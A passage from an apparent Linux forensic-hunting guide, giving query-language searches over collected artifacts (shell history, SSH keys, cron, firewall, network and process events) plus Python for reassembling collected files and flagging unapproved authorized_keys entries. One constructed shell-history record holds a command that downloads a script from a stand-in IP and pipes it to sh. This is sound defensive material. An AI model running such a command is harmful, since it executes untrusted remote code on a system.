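SHELL_SCRIPT = b"#!/bin/sh\nexport PATH=/usr/local/bin:$PATH\necho hello\n"
# Deterministic stand-in for packed or encrypted content: 131 is coprime to 256,
# so every byte value appears exactly 16 times and the entropy is exactly 8.0.
HIGH_ENTROPY = bytes((i * 131 + 17) % 256 for i in range(4096))

if __name__ == "__main__":
    for name, blob in (("shell script", SHELL_SCRIPT), ("opaque blob", HIGH_ENTROPY)):
        m = entropy_scan(blob)
        print(name, m, "suspicious" if looks_packed_or_encrypted(m) else "ok")
```

Compressed archives and images also score close to 8.0, so the entropy value is only meaningful together with TargetFileName and the location the file was collected from.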

EnvVars

Show all Fields

#event_simpleName=RuntimeEnvironmentVariable ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, EnvironmentVariableName, EnvironmentVariableValue], limit=max)

FileEntry

Show all Fields

#event_simpleName=FileEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Reassemble files by line

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max) | sort([TargetFileName, Line], order=asc, limit=max)

Shell history

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SHELL_HISTORY | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

SSH configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SSH_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Known hosts

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_KNOWN_HOSTS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Shell configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SHELL_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Authorized keys

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_AUTHORIZED_KEYS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)
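FileEntry returns one event per line, so the queries above sort by TargetFileName and Line to read a file back. The Python below is an added example, not CrowdStrike code: it performs that reassembly over an export of the FileEntry query, reports Line numbers that are absent from the collection (so a truncated file is not mistaken for a complete one), and compares the rebuilt authorized_keys files against an approved set of key comments, which is the check the FILE_AUTHORIZED_KEYS query feeds. The sample records are constructed, and the user@host comment convention is an assumption.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Constructed FileEntry records in the shape the query returns (not real
# telemetry). They are deliberately out of order, and the shell history is
# missing Line 2, so the gap check has something to report.
FILE_ENTRY_EVENTS = [
    {"aid": "host-a", "ForensicsCollectionIdentifier": "coll-1", "ContextTimeStamp": 1700000000,
     "FileEntrySourceType": "FILE_AUTHORIZED_KEYS", "TargetFileName": "/home/svc/.ssh/authorized_keys",
     "Line": 2, "ForensicsText": "ssh-rsa AAAAB3FAKEKEY2 ops@bastion"},
    {"aid": "host-a", "ForensicsCollectionIdentifier": "coll-1", "ContextTimeStamp": 1700000000,
     "FileEntrySourceType": "FILE_AUTHORIZED_KEYS", "TargetFileName": "/home/svc/.ssh/authorized_keys",
     "Line": 1, "ForensicsText": "ssh-ed25519 AAAAC3FAKEKEY1 deploy@ci"},
    {"aid": "host-a", "ForensicsCollectionIdentifier": "coll-1", "ContextTimeStamp": 1700000000,
     "FileEntrySourceType": "FILE_SHELL_HISTORY", "TargetFileName": "/home/svc/.bash_history",
     "Line": 3, "ForensicsText": "curl -fsSL http://198.51.100.7/x.sh | sh"},
    {"aid": "host-a", "ForensicsCollectionIdentifier": "coll-1", "ContextTimeStamp": 1700000000,
     "FileEntrySourceType": "FILE_SHELL_HISTORY", "TargetFileName": "/home/svc/.bash_history",
     "Line": 1, "ForensicsText": "ls -la /tmp"},
]


def fmt_time(epoch_seconds):
    """Same conversion the queries do with parseTimeStamp(format=seconds) and formatTime("%F %T")."""
    return datetime.fromtimestamp(int(epoch_seconds), tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def reassemble(events):
    """Rebuild each collected file: group by (aid, collection, path), order by Line.

    Returns {(aid, collection, path): {"time", "type", "text", "missing_lines"}}.
    missing_lines lists Line numbers absent from the collection, so a truncated
    or filtered file is visible instead of silently reading as complete.
    """
    groups = defaultdict(list)
    for ev in events:
        groups[(ev["aid"], ev["ForensicsCollectionIdentifier"], ev["TargetFileName"])].append(ev)
    files = {}
    for key, rows in groups.items():
        rows.sort(key=lambda r: int(r["Line"]))
        present = {int(r["Line"]) for r in rows}
        files[key] = {
            "time": fmt_time(rows[0]["ContextTimeStamp"]),
            "type": rows[0]["FileEntrySourceType"],
            "text": "\n".join(r["ForensicsText"] for r in rows),
            "missing_lines": sorted(set(range(1, max(present) + 1)) - present),
        }
    return files


def unexpected_authorized_keys(events, approved_comments):
    """Flag authorized_keys entries whose trailing comment is not in the approved
    set. Convention assumed here: the comment is the last token (user@host);
    entries with fewer than three tokens carry no comment and are always flagged."""
    findings = []
    for (aid, _coll, path), f in reassemble(events).items():
        if f["type"] != "FILE_AUTHORIZED_KEYS":
            continue
        for line in f["text"].splitlines():
            parts = line.split()
            if not parts or parts[0].startswith("#"):
                continue
            comment = parts[-1] if len(parts) >= 3 else ""
            if comment not in approved_comments:
                findings.append((aid, path, line))
    return findings


if __name__ == "__main__":
    for key, f in reassemble(FILE_ENTRY_EVENTS).items():
        print(key, f["time"], f["type"], "missing lines:", f["missing_lines"])
        print(f["text"])
    print(unexpected_authorized_keys(FILE_ENTRY_EVENTS, {"deploy@ci"}))
```

A key comment is free text that the key's owner controls, so a match against the approved set only narrows the list; the key material itself (the second token) is what to compare against the keys actually issued.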

Cron jobs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SCHEDULED | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System start configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_START | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System stop configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_STOP | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Kernel modules

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_KERN_MODULES | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

FirewallRules

FirewallRuleIP4

#event_simpleName=FirewallRuleIP4 ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, Protocol, FirewallAction, LocalAddressIP4, RemoteAddressIP4, NegateLocalAddress, NegateRemoteAddress, IcmpCode, IcmpType, LocalPortRangeStart, LocalPortRangeEnd, RemotePortRangeStart, RemotePortRangeEnd, RuleOrder, RuleTable, NFTRuleTable, RuleChain], limit=max)

FirewallRuleIP6

#event_simpleName=FirewallRuleIP6 ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, Protocol, FirewallAction, LocalAddressIP6, RemoteAddressIP6, NegateLocalAddress, NegateRemoteAddress, IcmpCode, IcmpType, LocalPortRangeStart, LocalPortRangeEnd, RemotePortRangeStart, RemotePortRangeEnd, RuleOrder, RuleTable, NFTRuleTable, RuleChain], limit=max)

FileDescriptorMonitor

Show all fields for ProcessOpenedFileDescriptor

#event_simpleName=ProcessOpenedFileDescriptor ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, RawProcessId, FileDescriptor, TargetFileName, FileOffset, Flags, MountNamespaceUniqueId, FileDescriptorType, EventFDCount, SignalMask, FanotifyFlagsArgument, FanotifyEventFlagsArgument, ClockId, Ticks, SettimeFlagsOctalString, SecondsUntilNextTick, NanosecondsUntilNextTick, IntervalSeconds, IntervalNanoseconds, SecondsInInterval, NanosecondsInInterval, SecondsUntilNextTimerExpiration, NanosecondsUntilNextTimerExpiration, TicksOccurred, ClockIdentifier, EventFDCounter, FileInode], limit=max)

FileInfo

Show all Fields

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, Size, UserName, MD5HashData, SHA1HashData, SHA256HashData, FileHeader, UnixGroupName, UnixMode, PosixFileType, UserSecurityDomain, TargetFileExtension, CompanyName, ImageInternalName, FileDescription, FileVersion, FileLegalCopyRight, CertificateExists, OriginalFilename, ProductName, ProductVersion], limit=max)

All files in /tmp/

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | TargetFileName = "*/tmp/*" | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, Size, UserName, SHA256HashData, UnixMode])

Search for the existence of /etc/rc.modules

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | TargetFileName=/^\/etc\/rc\.modules/ | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, Size, UserName, SHA256HashData, UnixMode], limit=max)
Important: The existence of this file is rare and warrants further investigation. This file is used to explicitly load kernel modules at boot time. For more info, see https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/s1-kernel-modules-persistant.

Identify large archive files

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | TargetFileName=/\.(tar|tar\.gz|tgz|gz|gzip|bz2|zip|rar|part)$/i | Size > 999999999 | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, Size, UserName, SHA256HashData, UnixMode], limit=max)
Note: The Size threshold is about 1 GB; adjust it to the environment. Large archives in user-writable paths such as /tmp or home directories are a common staging artifact before exfiltration and are worth correlating with BrowserDownloadEnded and the Network* events.

FileTimestampMetadata

Show all Fields

#event_simpleName=FileTimestampMetadata ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcFileChangeType, FfcFileIdentifier, PosixFileType, TargetFileName, aid, ForensicsCollectionIdentifier], limit=max)

Show most accessed directories

#event_simpleName=FileTimestampMetadata ForensicsCollectionIdentifier = * | FfcFileChangeType=CHANGE_ACCESSED | PosixFileType = DIRECTORY | groupby([TargetFileName], function=[collect([aid]), count(TargetFileName)], limit=max) | sort(_count, order=desc)

FsVolumeMounted

Show All Fields

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Flags,VolumeBusName, VolumeBusPath, VolumeDeviceModel, VolumeDevicePath, VolumeDeviceProtocol, VolumeDeviceRevision, VolumeDeviceInternal, VolumeDeviceVendor, VolumeIsNetwork, VolumeMediaBSDName, VolumeMediaBSDMajor, VolumeMediaBSDMinor, VolumeMediaBSDUnit, VolumeMediaContent, VolumeMediaEjectable, VolumeMediaName, VolumeMediaUUID, VolumeMediaSize, VolumeMediaWhole, VolumeMediaWritable, VolumeMountPoint, VolumeSectorSize], limit=max)

Show Fields Matching Volume Type

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier=* VolumeType=VOLUMETYPE | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Flags, VolumeBusName, VolumeBusPath, VolumeDeviceModel, VolumeDevicePath, VolumeDeviceProtocol, VolumeDeviceRevision, VolumeDeviceInternal, VolumeDeviceVendor, VolumeIsNetwork, VolumeMediaBSDName, VolumeMediaBSDMajor, VolumeMediaBSDMinor, VolumeMediaBSDUnit, VolumeMediaContent, VolumeMediaEjectable, VolumeMediaName, VolumeMediaUUID, VolumeMediaSize, VolumeMediaWhole, VolumeMediaWritable, VolumeMountPoint, VolumeSectorSize], limit=max)
Note: Replace VOLUMETYPE with the type of volume, such as tmpfs.

GroupAccount

Show all Fields

#event_simpleName=GroupAccount ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | parseInt("GID") | table([time, aid, ForensicsCollectionIdentifier, GID, UnixGroupName, GroupMemberUIDs], limit=max)

Users in group sudo

#event_simpleName=GroupAccount UnixGroupName=sudo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, GID, UnixGroupName, GroupMemberUIDs], limit=max)

Users in group root

#event_simpleName=GroupAccount UnixGroupName=root ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, GID, UnixGroupName, GroupMemberUIDs], limit=max)

The UIDs returned can be queried using the UserAccount event for further user account information. For example:

#event_simpleName=UserAccount ForensicsCollectionIdentifier=<collectionid> UID=<UID of interest>

InstalledApplication

Show all Fields

#event_simpleName=InstalledApplication ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | InstallDate := parseTimeStamp(field=InstallDate, format=seconds) | InstallDate := formatTime("%F %T", field=InstallDate) | BatchTimestamp := parseTimeStamp(field=BatchTimestamp, format=seconds) | BatchTimestamp := formatTime("%F %T", field=BatchTimestamp) | table([InstallDate, time, BatchTimestamp, aid, cid, ForensicsCollectionIdentifier, AppName, AppVersion, AppIdentificationData, AnnotationData, AppArchitecture, AppPath, AppPathFlag, AppProvider, AppType, BatchDataNumber, BatchDataTotal, UpdateFlag], limit=max)

Show results for a specific installed app of interest

#event_simpleName=InstalledApplication ForensicsCollectionIdentifier=* | AppName=<app name> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | InstallDate := parseTimeStamp(field=InstallDate, format=seconds) | InstallDate := formatTime("%F %T", field=InstallDate) | BatchTimestamp := parseTimeStamp(field=BatchTimestamp, format=seconds) | BatchTimestamp := formatTime("%F %T", field=BatchTimestamp) | table([InstallDate, time, BatchTimestamp, aid, cid, ForensicsCollectionIdentifier, AppName, AppVersion, AppIdentificationData, AnnotationData, AppArchitecture, AppPath, AppPathFlag, AppProvider, AppType, BatchDataNumber, BatchDataTotal, UpdateFlag], limit=max)
Note: Replace <app name> with the application name. Wildcards are allowed, for example AppName="*openssh*".

KernelModeLoadImage

Show all Fields

#event_simpleName=KernelModeLoadImage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ImageModuleName, ParameterList, ContextProcessId, ContextThreadId, TargetProcessId], limit=max)

Show Results for a specific image module by name

#event_simpleName=KernelModeLoadImage ForensicsCollectionIdentifier=* ImageModuleName= <Image Module Name> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ImageModuleName, ParameterList, ContextProcessId, ContextThreadId, TargetProcessId], limit=max)

LocalIpAddressIP4

Show all Fields

#event_simpleName=LocalIpAddressIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP4, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength], limit=max)

LocalIpAddressIP6

Show all Fields

#event_simpleName=LocalIpAddressIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP6, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength], limit=max)

LogEntry

Show all Fields

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show all logs in the /var/log directory

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogOrigin = "/var/log/*" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show UTMP log records with attributes

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | FfcLogSourceType = LOG_UTMPRECORD | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show all but UTMP log records

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | NOT FfcLogSourceType = LOG_UTMPRECORD | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show Linux audit logs

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | FfcLogSourceType = LOG_LINUXAUDIT | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show syslogs

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogOrigin = "/var/log/syslog*" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

NetworkCloseIP4

Show all Fields

#event_simpleName=NetworkCloseIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkCloseIP6

Show all Fields

#event_simpleName=NetworkCloseIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkConnectIP4

Show all Fields

#event_simpleName=NetworkConnectIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkConnectIP6

Show all Fields

#event_simpleName=NetworkConnectIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkListenIP4

Show all Fields

#event_simpleName=NetworkListenIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkListenIP6

Show all Fields

#event_simpleName=NetworkListenIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkReceiveAcceptIP4

Show all Fields

#event_simpleName=NetworkReceiveAcceptIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkReceiveAcceptIP6

Show all Fields

#event_simpleName=NetworkReceiveAcceptIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

OsVersionInfo

Show all Fields

#event_simpleName=OsVersionInfo ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| default(field=[AgentVersion], value="No Sensor Installed", replaceEmpty=true)
| table([time, MajorVersion, MinorVersion, OSVersionString, OSVersionFileName, OSVersionFileData, PlatformId, ProductName, ProductType, AgentVersion, SystemTimeZone], limit=max)

ProcessOpenedFileDescriptor

Show all fields for FileDescriptorMonitor

#event_simpleName=FileDescriptorMonitor ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, RawProcessId, FileDescriptor, MonitoredFileDescriptor, MonitoredFileDescriptorDataString, FileInode, Flags, WatchDescriptor, TargetDeviceId, EventsMask, IgnoredMask, FileHandleSize, FileHandleTypeNumber, FileHandleHexString, FileDescriptorType, FileHandleSizeInBytes, TargetDeviceIdentifier], limit=max)

ProcessRollup2

Show all Fields

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, ForensicsCollectionIdentifier, RawProcessId, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ProcessPriority, ProcessThreadCount, ProcessNiceValue, VirtualMemorySize, RSS, UID, RUID, SVUID, RGID, SVGID, TtyName], limit=max)

Search for process information with a command line of interest

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* CommandLine=<CommandLine of interest> | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, cid, ForensicsCollectionIdentifier, RawProcessId, ParentProcessID, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ProcessPriority, ProcessThreadCount, ProcessNiceValue, ResidentSetSize, RSS, VirtualMemorySize, UID, GID, RUID, RGID, SVUID, SVGID, TtyName, ControllingTerminal], limit=max)
Note: Wildcards are allowed, for example CommandLine="*curl*".

Search for process information with an image file name of interest

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* ImageFileName=<ImageFileName of interest> | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, cid, ForensicsCollectionIdentifier, RawProcessId, ParentProcessID, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ProcessPriority, ProcessThreadCount, ProcessNiceValue, ResidentSetSize, RSS, VirtualMemorySize, UID, GID, RUID, RGID, SVUID, SVGID, TtyName, ControllingTerminal], limit=max)

The RawProcessId returned per process can be used to pivot into the Network* and RawBind* events for network data related to a specific process. Network* events carry the process ID as ContextProcessId; RawBind* events carry it as RawProcessId. For example:

#event_simpleName=Network* ForensicsCollectionIdentifier=<collectionid> ContextProcessId=<Context Process ID> ImageFileName=<ImageFileName of interest> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RemoteAddressIP4, RemoteAddressIP6, RemotePort, LocalAddressIP4, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, ContextProcessId, ContextThreadId, InContext], limit=max)

RawBindIP4

Show all Fields

